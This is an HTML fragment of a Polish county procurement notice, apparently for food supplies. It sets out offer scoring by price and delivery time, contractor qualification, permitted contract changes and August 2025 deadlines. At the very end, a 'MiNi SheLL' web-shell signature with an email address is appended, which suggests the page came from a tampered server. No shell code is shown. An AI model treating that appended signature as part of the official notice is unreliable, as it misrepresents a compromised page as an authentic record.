zamówienia (T)	40<br/>Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę, że 1% = 1 punkt. <br/><br/>17.2. Kryterium „Cena” (C ) - 60% będzie rozpatrywana na podstawie ceny brutto danej części zamówienia, podanej przez Wykonawcę w ofercie.<br/>Ilość punktów w tym kryterium zostanie obliczona na podstawie poniższego wzoru: <br/> Cena min. (Cn)<br/>Cena(C) = ---------------------- x 60 pkt<br/> Cena Bad. of. (Cb)<br/>gdzie: <br/>C – ilość punktów za kryterium cena,<br/>Cn– cena brutto oferty najniższej spośród ofert nieodrzuconych, <br/>Cb – cena brutto oferty badanej oferty. <br/>Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku<br/>Maksymalna ilość punktów, jaką może uzyskać Wykonawca w kryterium cena – 60 pkt.<br/>17.3. Punkty za kryterium „Termin realizacji zamówienia’’ (T )- 40 % będą liczone w następujący sposób: <br/>	W kryterium „Termin realizacji zamówienia” oceniany będzie termin zadeklarowany przez Wykonawcę, zgodnie z poniższą tabelą. Oferty będą oceniane według następującego wzoru:<br/><br/>Lp.	Termin realizacji zamówienia	Liczba punktów<br/>1	W terminie 3 dni roboczych od dnia przekazania zamówienia telefonicznie lub e-mailem	00,00<br/>2.	W terminie 2 dni roboczych od dnia przekazania zamówienia telefonicznie lub e-mailem	20,00<br/>3	W terminie 1 dnia roboczych od dnia przekazania zamówienia telefonicznie lub e-mailem	40,00<br/><br/>T- ilość punktów za termin wykonania zamówienia.<br/>Zamawiający przyzna maksymalną ilość punktów tj. 40,00 (przy uwzględnieniu wagi wynoszącej 40,00%) Wykonawcy, który zaoferuje termin wykonania zamówienia 1 dnia od dnia przekazania zamówienia telefonicznie lub e-mailem.<br/>W pozostałych ofertach, punkty zostaną przekazane zgodnie z powyższą tabelą.<br/>UWAGA:<br/>Niepodanie w ofercie terminu realizacji dostaw będzie skutkowało uznaniem, że Wykonawca deklaruje termin dostaw – 3 dni robocze od dnia przekazania zamówienia telefonicznie lub e-mailem.<br/>Zaproponowanie terminu dłuższego lub innego niż określony w tabeli będzie skutkować odrzuceniem oferty jako niezgodnej z SWZ.<br/>17.4 Za najkorzystniejszą ofertę w danej części zamówienia zostanie uznana oferta, która otrzyma największą ilość punktów (O) obliczoną na podstawie wzoru:<br/> O= C+T<br/> Gdzie:<br/> O- łączna ilość punktów oferty ocenianej<br/> C- liczba punktów uzyskanych w kryterium „Cena”<br/> T – liczba punktów uzyskanych w kryterium „Termin realizacji zamówienia”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich<br/>w postępowaniu o udzielenie zamówienia albo do reprezentowania<br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia: oświadczenie o którym mowa w pkt. 8.1 SWZ składa z ofertą każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie te potwierdzają brak podstaw wykluczenia każdego z Wykonawców. <br/>3.	Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy<br/>w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 21.3	Projekt Umowy stanowi Załącznik Nr 3 do SWZ (taki sam dla każdej części).<br/>21.4	Zamawiający przewiduje możliwości wprowadzenia zmian do zawartej umowy, na podstawie art. 454-455 ustawy Pzp oraz postanowień Projektu Umowy.<br/>21.5 Poza zmianami przewidzianymi w art. 455 ust. 1 i 2 ustawy, Zamawiający przewiduje możliwość dokonania: <br/>1) zmiany terminu realizacji umowy, gdy jest ona spowodowana działaniem siły wyższej (tj. zdarzeniem losowym wywołanym przez czynniki zewnętrzne, którego nie można było przewidzieć ani mu zapobiec lub przezwyciężyć poprzez działanie z dochowaniem należytej staranności w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach) uniemożliwiającej wykonania przedmiotu umowy w określonym pierwotnie terminie. Zmiana terminu realizacji przedmiotu umowy nastąpi o okres działania siły wyższej oraz czas potrzebny do usunięcia skutków tego działania, <br/>2) zmiany wynagrodzenia Wykonawcy o wartość wynikającą ze zmiany kwoty podatku VAT, w przypadku zmiany stawki podatku VAT w czasie obowiązywania umowy. Stawka i kwota podatku VAT oraz wynagrodzenie brutto ulegną zmianie odpowiednio do przepisów prawa wprowadzających zmianę stawki podatku VAT, co oznacza, że Zamawiający dopuszcza możliwość zmniejszenia i zwiększenia wynagrodzenia brutto o kwotę równą różnicy wynikającej ze zmienionej stawki podatku - dotyczy to części wynagrodzenia za dostawy, których w dniu zmiany stawki podatku VAT jeszcze nie zrealizowano.<br/>3) pojawienie się na rynku promocji cenowej na dane artykuły spożywcze. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-08-19 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://powiattomaszowski.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-08-19 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-09-17</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com